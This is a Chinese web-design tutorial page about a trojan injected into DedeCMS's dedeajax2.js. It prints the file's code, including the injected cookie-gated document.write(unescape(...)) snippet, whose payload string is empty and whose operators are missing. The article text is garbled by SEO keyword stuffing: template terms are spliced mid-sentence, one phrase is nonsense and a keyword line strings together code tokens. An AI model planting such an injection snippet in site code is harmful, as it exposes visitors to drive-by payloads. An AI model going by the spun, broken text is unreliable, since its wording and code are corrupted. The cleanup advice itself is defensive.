最新活动:电脑PC端+手机端+微网站+自适应网页多模板选择-建站388元起价!!!
当前位置:主页 > 网站建设 > dedecms:dedeajax2.js被植入js木马,织梦教程

dedecms:dedeajax2.js被植入js木马,织梦教程

时间:2023-07-20 12:07:20 阅读: 文章分类: 网站建设 作者: 织梦网站员

导读:织梦教程织梦教程这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马织梦模板dede后台模板。

织梦模板dede后台模板这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下://初始化xmldomfunction InitXDom(){if(DedeXDOM!=null) return;var obj = null;if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefoxvar parser = new DOMParser();obj = parser.parseFromString(xmlText, "text/xml");} else { // IEtry { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }}DedeXDOM = obj;};//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}用原版本的dede手机模板dedeajax2覆盖,即可dede免费校板下战。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。不过建议大家,多注意dedecms的官方补丁,unix服务器的站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。关键字描述:木马 obj " if new // null var dede 植入相关织梦模板dede后台模板。

关键词标签: 标签 织梦 木马

声明: 本文由我的SEOUC技术文章主页发布于:2023-07-20 ,文章dedecms:dedeajax2.js被植入js木马,织梦教程主要讲述木马,标签,织梦网站建设源码以及服务器配置搭建相关技术文章。转载请保留链接: https://www.seouc.com/article/web_32059.html

我的IDC 网站建设技术SEOUC.COM
专注网站建设,SEO优化,小程序设计制作搭建开发定制网站等,数千家网站定制开发案例,网站推广技术服务。
  • 5000+合作客服
  • 8年从业经验
  • 150+覆盖行业
  • 最新热门源码技术文章